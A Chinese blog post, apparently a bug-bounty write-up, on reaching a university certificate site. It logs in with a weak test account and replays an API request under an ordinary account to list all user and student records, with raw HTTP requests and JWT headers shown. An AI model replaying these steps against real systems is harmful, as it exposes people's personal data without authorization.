记一次交大证书拿下过程

于 2023-09-27 08:28:43 发布
阅读量73 收藏
点赞数
分类专栏: SRC挖掘 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63356045/article/details/133337331
版权

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

    本次文章由知识星球内部群成员投稿,漏洞提交已修复。

图片

    对于现在的证书站来说,外网打起来难度有点大(大佬除外哈~),可以有账号直接冲,要么就自己注册个账号冲。

先注册的一个账户,抱着试一试看一看的态度,看看有没有漏洞

123@qq.com123456

抓这个包

图片

  • GET /api/v1/exproom HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrZW4iLCJpYXQiOjE2OTU0NzgyNjcsInRva2VuIjp7ImlkIjoyMTQwLCJsb2dpbl90aW1lIjoxNjk1NDc4MjY3fSwiZXhwIjoxNjk1NDc4Mjc3fQ.fLQL9MEEaIKkyeKhRHYx250-zkFrE58LsTG96qeYCk0
X-Requested-With: XMLHttpRequest
Connection: close

图片

查看到这里应该是有test用户

test/123456

图片

查看到一些账户

图片

所有学生账户

图片

如果这个拥有了test权限,尝试越权

/api/v1/user?agencyautoid=13&get_users_by_agency_root=

保留这个接口,后面给普通用户,替换接口达到越权

图片

  • GET /api/v1/user?agencyautoid=13&get_users_by_agency_root= HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
 

在切换到普通用户
 

123@qq.com123456
 

 

图片
 

抓这个包
 

GET /api/v1/user?autoid=2140 HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrZW4iLCJpYXQiOjE2OTU0NzkyMDAsInRva2VuIjp7ImlkIjoyMTQwLCJsb2dpbl90aW1lIjoxNjk1NDc5MjAwfSwiZXhwIjoxNjk1NDc5MjEwfQ.bVL0jdL55frL-vfl6oz4qKsE1ivjpECGC8_JC_T3_so
X-Requested-With: XMLHttpRequest
Connection: close
 

 

 

图片
 

替换接口后
 

 

图片
 

所有用户都在这里
 

欢迎大家关注"湘安无事"公众号

                

        

        

    

  


    

      

        

            

              
                
                  Shark_sec
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
北京交通大学应用随机过程课件.zip

				
			

			

				

					01-01
				

			

		

		

			
				
北京交通大学的这门应用随机过程课程,深入浅出地讲解了这一复杂的数学概念,旨在培养学生分析和解决实际问题的能力。  首先,Chapman-Kolmogorov方程是随机过程理论中的一个核心工具,它描述了两个不同时刻的概率...

			
		

	



                

              
                



	

		

			

				
					
交大-计算机第一次作业.doc

				
			

			

				

					12-06
				

			

		

		

			
				
通过对交大-计算机第一次作业的分析,我们可以总结出以下计算机基础知识点:  1. 计算机系统:计算机系统包括硬件系统和软件系统两个方面。硬件系统由运算器、存储器、输入设备、输出设备和控制器组成。软件系统包括...

			
		

	



                


  
              

                


	

		

			

				
					
上海交大计算机第一次作业(20211218123653).pdf

				
			

			

				

					11-16
				

			

		

		

			
				
上海交大计算机第一次作业(20211218123653).pdf

			
		

	





	

		

			

				
					
交大-第一次作业-计算机应用基础.doc

				
			

			

				

					06-22
				

			

		

		

			
				
"交大-第一次作业-计算机应用基础"  计算机应用基础是一门基础课程,旨在让学生了解计算机的基本概念、原理和应用领域。本资源汇总了计算机应用基础的主要知识点,涵盖计算机的定义、分类、组成原理、输入输出设备、...

			
		

	



		

			
		



	

		

			

				
					
西安交大版 随机过程课件(研究生,本科都适用)

				
			

			

				

					04-26
				

			

		

		

			
				
西安交通大学作为中国顶级学府之一,其在随机过程的教学方面有着深厚的基础和丰富的经验。这个课件集合可能是由西安交通大学的教授或教师团队编撰,旨在为研究生和本科生提供深入理解随机过程的理论和应用。  随机...

			
		

	





	

		

			

				
					
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》

				
			

			

				

					weixin_59086772的博客
				

				

					10-18
					
					8494
					
				

			

		

		

			
				
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。

今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。







一、网络安全行业市场发展情况

网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

			
		

	





	

		

			

				
					
SpringBoot+Vue电商个性化推荐系统答辩PPT.pptx

				
			

			

				

					10-10
				

			

		

		

			
				
计算机毕业设计答辩PPT

			
		

	





	

		

			

				
					
HIVE_整理.xmind

				
			

			

				

					10-10
				

			

		

		

			
				
HIVE_整理.xmind

			
		

	





	

		

			

				
					
毕设答辩PPT模板,免费分享 解压密码是作者名称首字母小写,喜欢的话关注一下作者,给个赞

					
最新发布

				
			

			

				

					10-10
				

			

		

		

			
				
毕设答辩PPT模板,免费分享 解压密码是作者名称首字母小写

			
		

	





	

		

			

				
					
SQLite与Python集成开发教程

				
			

			

				

					10-10
				

			

		

		

			
				
内容概要:本文详细介绍了SQLite数据库与Python的集成开发流程,涵盖基础知识、环境搭建、基本操作及高级功能。讲解了SQLite特点及其与Python整合的优点,并演示具体应用场景。适合Python开发者掌握高效数据处理技能。
适合人群:对Python开发感兴趣的技术人员,尤其适合有一定Python基础的人群。
使用场景及目标:适用于小到个人脚本大到企业级别的应用程序,目标在于掌握高效的数据库操作能力,提升应用性能。
其他说明:文中提供了完整的代码示例和技术指南,帮助读者快速上手并在实践中加深理解。


			
		

	





	

		

			

				
					
税收征收管理法3.pps

				
			

			

				

					10-10
				

			

		

		

			
				
税收征收管理法3.pps

			
		

	





	

		

			

				
					
基于Flask与OpenCV的图像直方图计算与均衡化处理工具(包含详细的完整的程序和数据)


				
			

			

				

					10-10
				

			

		

		

			
				
本文介绍了什么是图像直方图及其应用场景,并详细讨论了灰度直方图与彩色直方图的不同形式。接着提供了一个使用Flask框架与OpenCV-Python实现的工具用于显示图像直方图、进行直方图均衡化等操作,并通过实例展示其流程与最终的效果。
适合人群:具有一定Flask框架经验和熟悉Python的图像处理开发者。
使用场景及目标:①快速构建简单的图像分析网页平台;②探索不同条件下图像直方图特征对后续处理的影响。
其他说明:此外,本文还列举了几点未来的改进措施如动态参数调节与导出功能等,以进一步提升工具的应用价值。


			
		

	





	

		

			

				
					
计算机网络期末复习题.docx

				
			

			

				

					10-10
				

			

		

		

			
				
计算机网络期末复习

			
		

	





	

		

			

				
					
SpringBoot+Vue电影订票系统答辩PPT.pptx

				
			

			

				

					10-10
				

			

		

		

			
				
计算机毕业设计答辩PPT

			
		

	





	

		

			

				
					
MMC-HVDC,模块化多电平变器,高压直流输电,单相MMC,电压均衡控制,纹波抑制,模块化多电平变器,MMC,HVDC


				
			

			

				

					10-10
				

			

		

		

			
				
MMC-HVDC,模块化多电平变器,高压直流输电,单相MMC,电压均衡控制,纹波抑制,模块化多电平变器,MMC,HVDC


			
		

	





	

		

			

				
					
智慧工地-基于YOLOv9算法实现工地安全帽佩戴检测系统python源码+详细运行教程+训练好的模型+评估指标曲线.zip

				
			

			

				

					10-10
				

			

		

		

			
				
【使用教程】
一、环境配置
1、建议下载anaconda和pycharm
在anaconda中配置好环境,然后直接导入到pycharm中,在pycharm中运行项目
anaconda和pycharm安装及环境配置参考网上博客,有很多博主介绍

2、在anacodna中安装requirements.txt中的软件包
命令为:pip install -r requirements.txt
或者改成清华源后再执行以上命令,这样安装要快一些
软件包都安装成功后才算成功

3、安装好软件包后,把anaconda中对应的python导入到pycharm中即可(不难,参考网上博客)


二、环境配置好后,开始训练(也可以训练自己数据集)
1、数据集准备
需要准备yolo格式的目标检测数据集,如果不清楚yolo数据集格式,或者有其他数据训练需求,请看博主yolo格式各种数据集集合链接:https://blog.csdn.net/DeepLearning_/article/details/127276492
里面涵盖了上百种yolo数据集,且在不断更新,基本都是实际项目使用。来自于网上收集、实际场景采集制作等,自己使用labelimg标注工具标注的。数据集质量绝对有保证!

本项目所使用的数据集,见csdn该资源下载页面中的介绍栏,里面有对应的下载链接,下载后可直接使用。

2、数据准备好,开始修改配置文件
参考代码中data文件夹下的banana_ripe.yaml,可以自己新建一个不同名称的yaml文件
train:训练集的图片路径
val:验证集的图片路径
names:
0: very-ripe 类别1
1: immature 类别2
2: mid-ripe 类别3

格式按照banana_ripe.yaml照葫芦画瓢就行,不需要过多参考网上的


3、修改train_dual.py中的配置参数,开始训练模型
方式一:
修改点:
a.--weights参数,填入'yolov9-s.pt',博主训练的是yolov9-s,根据自己需求可自定义
b.--cfg参数,填入 models/detect/yolov9-c.yaml
c.--data参数,填入data/banana_ripe.yaml,可自定义自己的yaml路径
d.--hyp参数,填入hyp.scratch-high.yaml
e.--epochs参数,填入100或者200都行,根据自己的数据集可改
f.--batch-size参数,根据自己的电脑性能(显存大小)自定义修改
g.--device参数,一张显卡的话,就填0。没显卡,使用cpu训练,就填cpu
h.--close-mosaic参数,填入15

以上修改好,直接pycharm中运行train_dual.py开始训练

方式二:
命令行方式,在pycharm中的终端窗口输入如下命令,可根据自己情况修改参数
官方示例:python train_dual.py --workers 8 --device 0 --batch 16 --data data/coco.yaml --img 640 --cfg models/detect/yolov9-c.yaml --weights '' --name yolov9-c --hyp hyp.scratch-high.yaml --min-items 0 --epochs 500 --close-mosaic 15

训练完会在runs/train文件下生成对应的训练文件及模型,后续测试可以拿来用。

三、测试
1、训练完,测试
修改detect_dual.py中的参数
--weights,改成上面训练得到的best.pt对应的路径
--source,需要测试的数据图片存放的位置,代码中的test_imgs
--conf-thres,置信度阈值,自定义修改
--iou-thres,iou阈值,自定义修改
其他默认即可
pycharm中运行detect_dual.py

在runs/detect文件夹下存放检测结果图片或者视频

【备注】
1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用!有问题请及时沟通交流。
2、适用人群:计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工下载使用。

			
		

	





	

		

			

				
					
SpringBoot+Vue高校社团管理系统答辩PPT.pptx

				
			

			

				

					10-10
				

			

		

		

			
				
计算机毕业设计答辩PPT

			
		

	





	

		

			

				
					
拯救生命 拷贝.jpf

				
			

			

				

					10-10
				

			

		

		

			
				
拯救生命 拷贝.jpf

			
		

	





	

		

			

				
					
SpringBoot+Vue大学生在线租房平台答辩PPT.pptx

				
			

			

				

					10-10
				

			

		

		

			
				
计算机毕业设计答辩PPT

			
		

	





	

		

			

				
					
北京交通大学应用随机过程课件精华

				
			

			

				

					
				

			

		

		

			
				
本资源为北京交通大学提供的应用随机过程课程的课件压缩包,包含了一系列关于随机过程理论及其应用的详细教学材料。随机过程是概率论中的一个重要分支,它研究了随机变量序列随时间或其他参数的变化规律。这类课程...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值